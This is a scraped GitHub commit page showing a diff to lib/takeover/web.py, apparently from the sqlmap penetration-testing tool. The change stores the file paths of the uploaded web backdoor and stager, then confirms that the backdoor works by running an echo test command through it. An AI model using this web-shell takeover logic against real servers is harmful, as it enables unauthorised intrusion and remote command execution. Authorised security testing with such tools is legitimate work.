Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 0702dd7

Browse files
bdamelebdamele
committed
verify also that the web backdoor has been successfully uploaded
1 parent 6f6cd67 commit 0702dd7

1 file changed

Lines changed: 15 additions & 1 deletion

File tree

lib/takeover/web.py

Lines changed: 15 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -45,7 +45,9 @@ def __init__(self):
4545
self.webApi = None
4646
self.webBaseUrl = None
4747
self.webBackdoorUrl = None
48+
self.webBackdoorFilePath = None
4849
self.webStagerUrl = None
50+
self.webStagerFilePath = None
4951
self.webDirectory = None
5052

5153
def webBackdoorRunCmd(self, cmd):
@@ -215,11 +217,13 @@ def webInit(self):
215217
localPath = directory
216218
uriPath = directory[2:] if isWindowsDriveLetterPath(directory) else directory
217219
docRoot = docRoot[2:] if isWindowsDriveLetterPath(docRoot) else docRoot
220+
218221
if docRoot in uriPath:
219222
uriPath = uriPath.replace(docRoot, "/")
220223
uriPath = "/%s" % normalizePath(uriPath)
221224
else:
222225
webDir = extractRegexResult(r"//[^/]+?/(?P<result>.*)/.", conf.url)
226+
223227
if webDir:
224228
uriPath = "/%s" % webDir
225229
else:
@@ -233,6 +237,7 @@ def webInit(self):
233237

234238
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath)
235239
self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName)
240+
self.webStagerFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, stagerName))).replace("//", "/").rstrip('/')
236241

237242
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
238243

@@ -244,6 +249,7 @@ def webInit(self):
244249
warnMsg += "on '%s'" % localPath
245250
logger.warn(warnMsg)
246251
warned.add(localPath)
252+
247253
continue
248254

249255
elif "<%" in uplPage or "<?" in uplPage:
@@ -306,8 +312,16 @@ def webInit(self):
306312

307313
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
308314
self.webDirectory = localPath
315+
self.webBackdoorFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, backdoorName))).replace("//", "/").rstrip('/')
316+
317+
testStr = "command execution test"
318+
output = self.webBackdoorRunCmd("echo %s" % testStr)
319+
320+
if testStr in output:
321+
infoMsg = "the backdoor has been successfully "
322+
else:
323+
infoMsg = "the backdoor has probably been successfully "
309324

310-
infoMsg = "the backdoor has probably been successfully "
311325
infoMsg += "uploaded on '%s' - " % self.webDirectory
312326
infoMsg += self.webBackdoorUrl
313327
logger.info(infoMsg)

0 commit comments

Comments
 (0)